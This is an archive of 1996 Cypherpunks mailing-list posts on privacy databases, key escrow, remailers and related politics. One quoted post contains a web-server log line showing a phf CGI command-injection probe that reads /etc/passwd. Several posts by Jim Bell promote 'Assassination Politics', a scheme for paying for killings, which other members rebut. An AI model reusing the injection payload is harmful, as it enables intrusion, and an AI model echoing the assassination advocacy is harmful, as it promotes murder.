Teddy Kennedy getting away with the Mary Jo Kopechne thing?).

Actively (and plausibly) threatening _anyone_ is a kind of crime (*), but
there is no reason to make special laws covering certain persons.

(* Why do I say "actively (and plausibly) threatening _anyone_ is a kind of
crime"? Don't I believe in free speech? Well, if I hear that Vladimir G.
Nulis says I should be killed, and that he is coming to California to take
care of this, I have no compunctions, liberrarian or otherwise, about
shooting first at the first sign of his appearance on my property.
Understandably, the government does not wish this to happen. Thus, I have
no problem with illegalizing direct and concrete threats. General threats,
such as "all lawyers should be taken out into the parking lot and garotted"
are not specific, direct, and concrete, and hence fall under the free
speech provisions.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Sep 1996 03:19:06 +0800
To: burris@apdg.com
Subject: Re: DL in exchange for fingerprint
In-Reply-To: <ae66bb9816021004790c@[207.167.93.63]>
Message-ID: <324415D5.24E7@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Kurt Vile wrote:
> >By the way, the next rev of the California driver's license will
> >reportedly have one's *Social Security Number* printed on the card!
> >So much for the statement clearly printed on my card:
> Illinois already has such a law, in fact you must have an SSN to
> even get a DL.  Fortunately, the law allows a citizen-unit to choose
> if they want their SSN on their DL (imagine that, a choice!) - the
> flip side is that you have to specifically ask them not to print
> them - they won't ask you.
> One would hope that CA's law might provide a similar out...

Oh, yeah.  This "optional" SSN is a great idea, yeah.  So late at night, 
you get pulled over, and the officer notes that YOU (one of less than a 
thousand people who don't have the DL-SSN) don't actually have the 
DL-SSN.  Well, just don't get pulled over....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Sep 1996 03:10:22 +0800
To: Jonathan Corbet <corbet@stout.atd.ucar.edu>
Subject: Re: anonymous bacon
In-Reply-To: <199609201506.JAA03295@atd.atd.ucar.EDU>
Message-ID: <324417C8.6E9E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Corbet wrote:
> The following, from RISKS, deserves redistribution....
> Date: Tue, 17 Sep 1996 13:04:47 -0400
> From: pcw@access.digex.net (Peter Wayner)
> Subject: Bringing Home the Anonymous Bacon
> The *Baltimore Sun* reports in its 17 Sep 1996 issue that people in
> Baltimore are paying for drugs with meat (page A1! [pretty saucy!]).
> Perhaps this is not yet anonymous digital cash, but certainly
> anonymous. [Now someone is going to propose keeping a database of all 
> sides of beef, and steganographically watermarking the meat in the
> context of digitally signed scannable grade-stamps.  Perhaps the next 
> step in monitoring the private drug-meat trade would be to escrow the 
> inspectors' private keys, derived from the product of two U.S. Primes, 
> and put the database up on the net: the T-bone connected to the 
> M-bone, etc.?  PGN]

Did you ever see one of those mattress tags which reads something like 
"removal of this tag is a violation of ..... and is punishable by ..."?
They could tag the stuff, then make it a violation of law to cut the 
meat before final consumption.  The IRS is very concerned about barter, 
and besides, how are you gonna go half way on legislating against 
untraceable barter (other than to prohibit dividing the beef)?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 21 Sep 1996 19:57:36 +0800
To: cypherpunks@toad.com
Subject: G48_bul
Message-ID: <199609210953.JAA12760@pipe1.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   CIAC has issued Bulletin G-48 on the denial-of-service  
   attacks by TCP SYN flooding and IP spoofing. 
 
      Two "underground magazines" for intruders have 
      recently published code to conduct denial-of-service 
      attacks by creating TCP "half open" connections. Any 
      system connected to the Internet and providing 
      TCP-based network services such as a Web server, FTP 
      server, or mail server is potentially subject to this 
      attack. Systems providing TCP-based services to the 
      Internet community may be unable to provide those 
      services while under attack and for some time after 
      the attack ceases. See the bulletin below for 
      information on how to protect your site from these 
      attacks. 
 
   ----- 
 
   http://jya.com/g48bul.txt  (15 kb) 
 
   G48_bul 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 22 Sep 1996 03:00:31 +0800
To: Lucky Green <cypherpunks@toad.com
Subject: Re: Free RSA chip
Message-ID: <199609211655.JAA21400@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:04 PM 9/16/96 -0700, Lucky Green wrote:
>I secured a 30 page data sheet for the new NTT (actually NLC, a subsidiary
>of NTT) RSA accelerator chips. The NLC0048 LSI chip can handle keys up to
>1024 bits. The secret key can be stored on-chip. If you want a copy of the
>data sheet, email me your fax number. 
>
>Furthermore, I have *one* sample chip that I am willing to loan to 
>somebody in the SF Bay Area with sufficient hardware knowledge to put the 
>chip to good use. If you think you qualify, let me know who you are and 
>why you think that you should get the chip. I apologize in advance to the 
>qualified candidates that do not get the chip. There is only one (that I 
>can loan out).

I don't want the chip, but I'd like to know a few things.

1.  How much of a secure telephone does it contain?

a.  voice A/D/A?

b.  modem A/D/A DSP?

c.  Keyboard multiplex?

d.  control microprocessor?

e.  Encryption section?


2.  Is there any indication that NT+T has worked with any other 
manufacturers to design some sort of inter-telephone negotiation standard, 
one that would allow the kind of inter-compatibility that modems have today?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 22 Sep 1996 03:19:31 +0800
To: cypherpunks@toad.com
Subject: Re: Kiddie porn on the Internet
Message-ID: <199609211655.JAA21404@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:33 PM 9/16/96 -0400, hallam@ai.mit.edu wrote:
>
>>Yet another obligatory AP (Assassination Politics) reference:  If a person 
>>is really interested in helping out "starving children" he may be able to do 
>>far more good by purchasing the death of the local tyrant(s), rather than 
>>(just) buying more food.
>
>
>The problem is that assasination rarely leads to the installation of
>a government that is any better. In most cases it gets worse.


There is an enormous difference in significance between the following two 
scenarios:

1.  Tyrant A, speaking outside, gets struck by a meteorite and is instantly 
killed.  He is immediately replaced by his second-in-command.

2.  Tyrant B is told that he has been threatened with a meteorite strike by 
an opponent in an hour if he goes on with his speech, he ignores the 
"unbelievable" warning, and dies on schedule, just as he was warned, struck 
by a meteorite.  What should his vice-thug do in THIS case?!?

 Physically, the same thing happened:  Big boom.  But the implications are 
vastly different.   Incident 1 looks like a freak of nature that's unlikely 
to be repeated. It leads to very few policy changes or changes in 
precautions. It was a fluke.   Incident 2 looks like somebody has developed 
a new weapon of practically supernatural capabilities. 

This difference is why I scoff at your attempts to equate political 
assassination in the past with what will be accomplished in the future.  
(other people have made this mistake as well; it's a common 
misunderstanding.)   In the past, assassinations have often led to worse 
replacements, but that is because there is no likely prospect that the 
assassination will be repeated, as many times as needed, until the job is 
done.  Partly that's because assassinations were often seen to be the work 
of "lone nuts" (who don't come around all that often), or because they were 
done by the very people who take over.  In either case, the prospects of a 
repeat are rather low.

As anyone who really understands my AP theory recognizes, getting rid of an 
unwanted leader will become so easy and cheap (on a per-citizen basis) that 
nobody would dare take the job who angered more than a tiny fraction of the 
population.  A "worse" government would simply never be formed, unless they 
were suicidal.


>In the past the US excuse for supporting bloodthirsty murderers like
>Pinochet, Saddam, Marcos and Noriega was that the alternative was
>worse.


The _truth_, however, is that the alternative was worse...for the US 
government.  It's really very simple: Let me draw an analogy.  Modern 
organophosphate pesticides were initially developed by German chemists in 
the 1930's.  These materials are closely related to Sarin, the well-known 
nerve agent that killed people in the Tokyo subway attack over a year ago. 
It turns out that Sarin is a rather simple molecule.  Why not use it to kill 
bugs?  Well, it kills bugs just fine.  The problem, of course, is that it 
kills farmers just as well.
  
Since you presumably don't want to do that, you have to go to all the 
trouble to find compounds that kill bugs, but are as non-toxic as possible 
to farmers.  And if you look at the description of the contents of modern 
organophosphate pesticides on the bottles, you see names that only a chemist 
could possibly pronounce, names so long (because their molecules were so 
complex) that you often have to take a breath in the middle to recite.  
These compounds were found by individually synthesizing thousands, or even 
tens of thousands of compounds, and testing each one.  Individually.  
Eventually, they found compounds which were as toxic to bugs as Sarin is to 
humans, but were far less toxic to humans.  They found the needle in the 
haystack.

Likewise, as I've discovered through AP, it will be easy to get rid of 
tyrants.  The exquisitely difficult task is to get rid of ONLY SOME of the 
tyrants, for example Saddam Hussein, Moammar Khadafi, etc, and leaving most 
of the rest behind.  _THAT'S_ the tricky part.   I have the easy task:  
describing a system to get rid of them all, with no exceptions.  But that's 
the system that nobody in the leadership of any current country wants to see. 

That is why you won't see Clinton announcing that he's going to use my idea 
to get rid of Saddam Hussein, and instead will waste hundreds of millions or 
even billions of dollars in a failed bid to eject the thug.

Doesn't that make you feel a lot safer?





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 22 Sep 1996 03:05:52 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: IBM_gak
Message-ID: <199609211655.JAA21426@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:17 AM 9/16/96 -0700, Lucky Green wrote:
>On Mon, 16 Sep 1996, John Young wrote:
>>    9-15-96. PcWe: 
>>    "IBM Boosts Encryption Initiative " 
>>  
>>       IBM security initiatives next month will include a 
>>       new way to build encryption into software and 
>>       technology that could enable U.S. companies to export 
>>       products with strong encryption algorithms. IBM also 
>>       will introduce several "key-recovery" technologies 
>>       that could enable businesses to satisfy the 
>>       requirement imposed by the U.S. government that it be 
>>       able to access encrypted data on demand.
>
>Aparently, Al Gore's recent phone calls to everybody who is anybody in the 
>industry have paid off. After HP, TIS, and other unnamed parties, now IBM 
>is supporting GAK. Folks, this battle is lost. Domestic GAK is coming to 
>a PKI near you.


So, the "Little Tramp" and the "Great Dictator" turn out to be one and the same...

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sun, 22 Sep 1996 03:27:37 +0800
To: cypherpunks@toad.com
Subject: job testing SSL
Message-ID: <199609211702.KAA09826@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


We're looking for someone who can test an SSL implementation in Java. 
If you're interested send a resume or a URL either to me or to the
group.   My email is mrm@eng.sun.com, the group gets resumes at
jeeves-jobs@goa.eng.sun.com.      If you're interested in the context,
see http://java.sun.com/products/jeeves.     If you're Perry and you
want to flame me send email to mrm@eng.sun.com :-) 

Marianne
http://java.sun.com/people/mrm/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wearen Life <runnerfx@octet.com>
Date: Sun, 22 Sep 1996 00:25:04 +0800
To: Skeeve Stevens <skeeve@skeeve.net>
Subject: Re: Go away CIA
In-Reply-To: <199609201646.CAA00999@myinternet.myinternet.net>
Message-ID: <Pine.BSF.3.95.960921101351.28537A-100000@iron.octet.com>
MIME-Version: 1.0
Content-Type: text/plain


I wont be suprised if they where ALSO watching who was visting your page.
I think now is the time to start looking in your hard drive or floppy
disk for anything that my incrimanate you. (did i spell that right)?

tah ta



/*---------/*
Wearen Life
www.octet.com/~runnerfx
Job: Wish I had one
Home: Cyber Space
Work: Refer to "Job"


On Sat, 21 Sep 1996, Skeeve Stevens wrote:

> 
> 
> Well well...
> 
> After putting up the CIA hack mirror page on http://www.skeeve.net/cia/
> I learnt a few things.
> 
> o it got 50,000 hits in 1 day
> o everyone from the cia, senate, fbi, nsa (ncsc) and every other bloody US gov
>   department looked at it masses of times. The CIA looked at it every 10-15
>   minutes.
> zztop{root}:15: cat skeeve.net-access_log | grep ucia.gov | wc -l
>     281
> 
> o Even the CIA tries to hack you.  
> 
> relay1-ext.ucia.gov unknown - [21/Sep/1996:01:56:44 +1000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 1180
> 
> o Dozens of in.fingerd/in.telnetd attempts from ucia.gov, some mil sites and
>   ncsc.mil sites.
> 
> as I speak the house are looking at it.
> b252-209.house.gov unknown - [21/Sep/1996:02:41:37 +1000] "GET /cia/
> 
> 
> I "PRESUME" there are no laws (international or otherwise) being broken by
> my housing of the mirror... not like I actually care.. but it would be good
> to know.
> 
> Ok... ive been up all night chuckling at all the different sort of sites hitting
> the mirror... time to sleep.
> 
> 
> --------------------------------------------------------------------
> Skeeve Stevens                              Email: skeeve@skeeve.net
> CEO/The Big Boss/All round nice guy      URL: http://www.skeeve.net/
> MyInternet                               Australian Anglicans Online
> http://www.myinternet.net/               http://www.anglican.asn.au/
> Phone: (+612) 869-3334        Mobile: (0414) SKEEVE [+61414-753-383]
> Key fingerprint  =  D2 7E 91 53 19 FE D0 5C  DE 34 EA AF 7A 5C 4D 3E
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Sep 1996 12:31:00 +0800
To: cypherpunks@toad.com
Subject: William Torbitt (pseudonym)
Message-ID: <ae69eea103021004221b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:53 AM 9/22/96, Dale Thorn wrote:

>A few years ago, William Torbitt (pseudonym) wrote in part: "Penal codes
>have had two historic purposes - to deter crime and reform the offender.
>.....However, when the head of the National Police agency joins with a
>handful of other govt. leaders, and they both in turn throw in with
>organized crime to murder the president, and the people have an uneasy
>feeling that something of this nature has taken place, it is only
>natural that crime and violence increase, and the basic deterrent to
>crime has broken down." (quote approximate)

Presumably the same William Torbitt (psuedonym) who wrote the
Samizdat-distributed "Nomenclature of an Assassination Cabal."

(One of the best treatments of the various swirling connections surrounding
the JFK assassination and related CIA-Mob-Giancana-Hughes-Castro-etc.
connections.)

That Torbitt was a pseudonym has some connection to the themes of our list.
It is believed by many--and it sounds plausible to me--that the actual
author was a knowledgeable Texas attorney who had gained much familiarity
with the facts of the case and, circa 1966-68, wrote his extended pamphlet
"The Nomenclature of an Assassination Cabal." Fearing likely sanctions,
both professional and personal, he chose not to use his real name, and
pamphlet circulated informally, without a formal publisher.

(It is not written in a wacko-style, so I don't dismiss it as the ravings
of a loon.)

I haven't checked to see if its on the Web.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Sep 1996 12:13:35 +0800
To: cypherpunks@toad.com
Subject: Re: The GAK Momentum is Building...
Message-ID: <ae69f0e804021004ab04@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:56 AM 9/22/96, jim bell wrote:

>But as usual, you ignore the obvious solution to the problem.  Let's suppose
>the amount of the fine is set at $1000 per day.  Actuarially, this works out
....
>Naturally, you won't even consider the possibility of going outside the
>system to solve a problem.  The rest of us notice that there are probably
>thousands of terminally-ill people who would gladly act as a human kamikaze
...

I get the feeling that the "standard form letter" for all such invocations
of AP is turning out to be:

"Suppose you owe somebody money. It is much cheaper just to use AP to have
him killed."


Indeed, this "simple" solution is ever so much cheaper than paying a fine,
repaying a loan, fulfilling an obligation, whatever.

(P.S. The hiring of terminally-ill kamikazes is an old one.)


--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Sun, 22 Sep 1996 05:41:21 +0800
To: cypherpunks@toad.com
Subject: Re: "Remailers can't afford to be choosy"
In-Reply-To: <ae5e35f8070210041ef6@[207.167.93.63]>
Message-ID: <v03007802ae69ee05237d@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


One important differentiation to make is filtering on form vs. filtering on
content. Most if not all remailers have clear usage guidelines. These
indicate several form restrictions on what messages the remailer is
offering to transmit. These restrictions may be on message size,
instruction formatting, number of destinations for one message, or number
of identical messages. These restrictions are no more censorship than
restricting messages to SMTP compliant ascii.

Where people do not follow the stated rules, I take action to enforce them.
Either by source blocking the abuser if known, destination blocking the
destination, or trying to apply public pressure. I think all these actions
are completely reasonable, given that the proper use guidelines were
clearly defined up front. It is similar to putting up a fence around your
yard when people start hanging out there uninvited.

Of necessity most remailers also restrict some content. This is very
difficult to enforce, but is generally done for legal reasons. I restrict
illegal and harassing posts. Since I don't see the content, these
provisions are largely unenforced.

Are you suggesting that I not take perfectly legal and open actions to
enforce the public statement of allowed uses of my remailer?

	-Lance


----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@chen.com (Mark Chen)
Date: Sun, 22 Sep 1996 05:18:26 +0800
To: ericm@lne.com (Eric Murray)
Subject: Re: How's the list?
In-Reply-To: <199609210245.TAA22366@slack.lne.com>
Message-ID: <9609211924.AA00422@pela.chen.com.>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray writes:
> Phil Fraering writes:
> 
> > * I'm now working part of the time at a company that has a lot of
> > mail-order sales; are any of you aware of how much credit card fraud is
> > going on out there right now?
> 
> No, how much?

About twenty basis points with respect to dollar volume.


--
Mark Chen 
415/341-5539
chen@chen.com
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Sun, 22 Sep 1996 04:18:44 +0800
To: cypherpunks@toad.com
Subject: Re: ANYONES CREDIT CARD # per your request.
Message-ID: <199609211740.MAA09483@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sat Sep 21 12:32:13 1996
> > > Note: Lexis-Nexis is only accepting written or fax requests.  You
>  have the 
> > > option to fax your removal request to (513) 865-1930 state your full
>  name 
> > > and complete address.  Or mail the request to:
> > >         Lexis-Nexis
> > >         Attn: P-Track
> > >         P.O. Box 933
> > >         Dayton, Ohio
> > >         45401-0933

According to the 800 number, you may also be removed from
their database by sending a letter to p-trak@prod.lexis-nexis.com.
You need to send your name and address, and probably your Citizen-
Unit Social Insecurity Number.

dave



- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key
"The world's at stake. Don't confuse me with details."
 -- Captain America, "Onslaught" ... famous last words

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMkQmnzVTwUKWHSsJAQEClgf/XsSOwYPANaQBXVg+vq/Oh5qgqEMZtyxZ
CVy45RYlulXWKMixmWMn7OkebSug53xVfQoBR5SlZ3oCXN+KlQm0bLI1MKiiO0nv
SlRz35x6O2lkXXQcyBF1brrk++1uXRQRsKIACh/ceTdMkkTyUk+u0imRschGslqp
L84BVvhi/VVASrCgmY5HbwkeeqNlzDUpa5uD9ST10G9UvCMrf6IexEOzvGvfCzmt
CFOELYK6e8iiVkP8sPQgj+yQaP08LyezlYuSRu+GcZhr3QljCuOjUghjCIe/aoJk
7RRSiGC/GXGtO/Ut5pOiTOkWmaTPiHUsxnb4cX2lijLyI+jXy5K5qA==
=vyc3
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omegaman@bigeasy.com>
Date: Sun, 22 Sep 1996 04:16:22 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Lexis-Nexis scare = opportunity
Message-ID: <Pine.LNX.3.95.960921122457.179B-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been reading articles about the recent flap over Lexis-Nexis' P-TRAK
database with interest.  A recent Associated Press article said that the
lines at Lexis-Nexis have been jammed with individuals requesting they be
removed from the database.

Lexis-Nexis is certainly not the only database of its kind, but it has
certainly generated quit a bit of attention and panic

In terms of cypherpunk goals, I think this is a positive development.  It
demonstrates ever-so-clearly that the average "Joe Schmoe" does not follow
the government line that privacy and security are mutually exclusive
concepts.  Rather, there is an instinctive recognition that privacy and
security are inextricably linked.

Only when the government pulls on emotional (as opposed to logical) strings
by pulling out the "if you only knew what we knew" & "if it saves just one
life" arguments does the easily swayed public get pulled in the other
direction.

The flap over P-TRAK repudiates arguments by Freeh and others that American
citizens want to give up their freedoms in the interest of security.

If you are in a position to influence government policy (ie. Jim Ray with
Judge Kozinski, EFF personages involved in the Bernstein case, PRO-CODE
advocates, et al.), then keep these clippings handy.  Here is a concrete
example that our government and law-enforcement leaders are woefully out of
touch with average citizens (not to mention reality!).

The leap from P-TRAK to GAK is not that large in the so-called court of
public opinion.

Sometimes monkey-wrenching is as simple as pointing out the obvious.

me

_______________________________________________________________
 Omegaman <mailto: omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63
 Send e-mail with "get key" in the "Subject:" field
 to get a copy of my public key
_______________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan McGuirk <mcguirk@indirect.com>
Date: Sun, 22 Sep 1996 06:13:27 +0800
To: cypherpunks@toad.com
Subject: Where to write crypto?
Message-ID: <Pine.BSD/.3.91.960921130248.11397C-100000@bud.indirect.com>
MIME-Version: 1.0
Content-Type: text/plain


If I want to go to a country outside the United States to write 
cryptographic code that will be freely distributable, what's the best 
place to go?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@vesuvius.ai.mit.edu
Date: Sun, 22 Sep 1996 04:18:56 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Kiddie porn on the Internet
In-Reply-To: <199609211655.JAA21404@mail.pacifier.com>
Message-ID: <9609211734.AA15897@vesuvius.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



[AP drivel deleted]

Go talk to someone who is a member of an organisation like the PLO or
Hammas and pretty near the top. If you think that they would be intimidated
for a moment by AP you have another think comming.

If it could the US would have assasinated Saddam by now. It can't because it
is too difficult to find out where exactly a person will be. Assasination
attempts against Castro similarly failed. 

If you care to look at the history of Cambodia you will see that Lon Nol
assumed the presidency despite the knowledge that there was practically no ch
chance of defeating the Khumer Rouge and that he would almost certainly be dead
in less than a week as a result. 

Both the assumption AP rests on are utterly false. It is neither possible
to assasinate people at will nor will it intimidate. 

In addition *ANYONE* who attempted to implement AP would be someone *I*
would regard as a tyrant and therefore a legitimate target by the rules
of AP. I would naturally consider it permissable to engage the support of 
others in their suppression. Since we now live in the fantasy land of AP
I can now wipe out anyone anywhere so I eliminate all AP leaders.


I think that this type of talk is incredibly dangerous. There are plenty of
people on the net who are psychos and if you spread AP drivel arround someone
is going to act on it. Probably not Jim Bell, more likely a psychopath who
lurks on the list but does not post. 

If you call for people to be murdered - and let us not forget that this is
what AP is about you bear the responsibility when someone acts on it.



I consider AP to be very close to calling for the assasination of the 
President of the USA. That is a federal crime and there is a law that 
requires the investigation of any such threats. I suggest that people
think *very* carefully before engaging in this dangerous nonsense any
further. 

	Phill

PS it is not censorship to stop people from advocating murder.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 22 Sep 1996 06:50:05 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: [Noise] anonymous bacon
Message-ID: <3.0b16.32.19960921133449.00684550@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:28 AM 9/21/96 -0700, Dale Thorn wrote:
>Jonathan Corbet wrote:
[Government Access to Meat stuff from Risks deleted]
>
>Did you ever see one of those mattress tags which reads something like 
>"removal of this tag is a violation of ..... and is punishable by ..."?
>They could tag the stuff, then make it a violation of law to cut the 
>meat before final consumption.  The IRS is very concerned about barter, 
>and besides, how are you gonna go half way on legislating against 
>untraceable barter (other than to prohibit dividing the beef)?

And meat tenderizers would be outlawed, because it would be viewed as an
effort to obscure the markings.  (You could be sent to jail for beating
your meat!)

Think of the legal liability for selling someone meat that is later
involved with the drug trade!  The way the laws are going, you could lose
everything for selling a steak to a known drug user.  Soon you would have
meat market laws similar to the alcohol laws in Utah.  You will have to eat
the steak on the premises, in front of a government authorized and licensed
vendor.  (Until the cholesterol police make meat consumption a crime.)

Soon we will have gangs fighting over the illegal meat trade.  Meat will be
murder!  Instead of "drive-ins", we will have "drive-bys".  Government will
have an even bigger reason to put a steak through our civil rights.  Our
goose will be cooked!

Then people will go to trading vegetables and grain.  And all the "honest
folks" will be left with nothing to eat but rocks.  (Until, those too are
banned because someone might throw one...)

---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Art <blackart@ctrl-alt-del.com>
Date: Sun, 22 Sep 1996 07:15:48 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: Re:  Going AP Shit on the Internet
Message-ID: <3.0b16.32.19960921133414.0069a754@www.ctrl-alt-del.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:34 PM 9/21/96 -0400, hallam@vesuvius.ai.mit.edu wrote:
>
>[AP drivel deleted]
>
> [Examples of where AP would fail deleted] 
>
>Both the assumption AP rests on are utterly false. It is neither possible
>to assasinate people at will nor will it intimidate. 
>
>In addition *ANYONE* who attempted to implement AP would be someone *I*
>would regard as a tyrant and therefore a legitimate target by the rules
>of AP. I would naturally consider it permissable to engage the support of 
>others in their suppression. Since we now live in the fantasy land of AP
>I can now wipe out anyone anywhere so I eliminate all AP leaders.

I'd buy that for a dollar!

I would expect that only a small portion of the "targets" on an actual AP
system would be political figures.  People have a far broader range of
people they would like to see eliminated.

How many "hits" would John Tesh have gotten after the Olympics?

How many "hits" would Urkel get after anyone actually watched him on TV?

These powers could be used for good or evil!

People do not just want to kill politicians.  Many of them would like to
kill people they find annoying in their general lives.  TV stars.
Advertising executives.  Bosses.  Bill Gates. Brings stalking to a new level!

Say a company came out with an Internet browser that was considered the
"market leader".  A less scrupulous competitor (who has a large company and
lots of cash) could afford to have key personnel off-ed as a part of "doing
business". (And it would not have to be the figureheads.  Less well-known
people in charge of key areas, like security could be off-ed.)  Is your job
important to KILL FOR?  They could even hide it in the sales and promotion
budget.

It could change the face of business forever!

Who do you want to kill today?

There is no mechanism to assure that AP is used for only the people that
Mr. Bell would like to see killed.  If it is implemented, then EVERYONE is
a target.

>I think that this type of talk is incredibly dangerous. There are plenty of
>people on the net who are psychos and if you spread AP drivel arround someone
>is going to act on it. Probably not Jim Bell, more likely a psychopath who
>lurks on the list but does not post. 

Actually, I would expect that the various government agencies would do
their best to track down those trying to implement such a system.
Governments do not take competition lightly.

The odds of getting a real hit man are also small.  The FBI has agents who
frequently pose as hit men for the sole purpose of tracking down those who
want to eliminate their friends and neighbors.  Only organized crime and
government have easy access to assassination.  ("Government Access to
assassination" Escrow anyone?)

>If you call for people to be murdered - and let us not forget that this is
>what AP is about you bear the responsibility when someone acts on it.

I do not think that Mr. Bell is willing to examine the moral consequences
of the things that he advocates.  (He would get alot more respect from me
if he would own up to it and admit he is wanting to see mass murder for
hire.)  There seems to be a big blind spot here.

It would also be a great excuse for the bluenoses who want to regulate the
net into extinction.  (Advocating murder is not taken well in our society,
even if the targets deserve it.)

>I consider AP to be very close to calling for the assasination of the 
>President of the USA. That is a federal crime and there is a law that 
>requires the investigation of any such threats. I suggest that people
>think *very* carefully before engaging in this dangerous nonsense any
>further. 

Facilitating the murder of others through hiring of hit men is illegal no
matter who the target is.

I wonder how he would find a service provider that would dare host the
site.  I know of no "data haven" that would risk having a murder for hire
server anywhere near their site.  They would find their feed cut pretty
quick or feel the sting of legal liability or both.  (Part of being a "data
haven" is not to attract attention to yourself.  The first rule of not
being seen is "Don't stand up".)

>PS it is not censorship to stop people from advocating murder.

I disagree with this conclusion.  It IS censorship.  The only thing that
seems to change it is the subject matter.  If it was changed to "it is not
censorship to stop people from advocating cryptography" or "unrestrained
sex" or "destruction of the ruling party" would you still agree?  Sometimes
advocating murder is considered valid.  (As the various people in the media
talking about how "we should have offed Husain (sp?).)  How do you make the
distinction.  Whoever is in power this week?  I think not.  

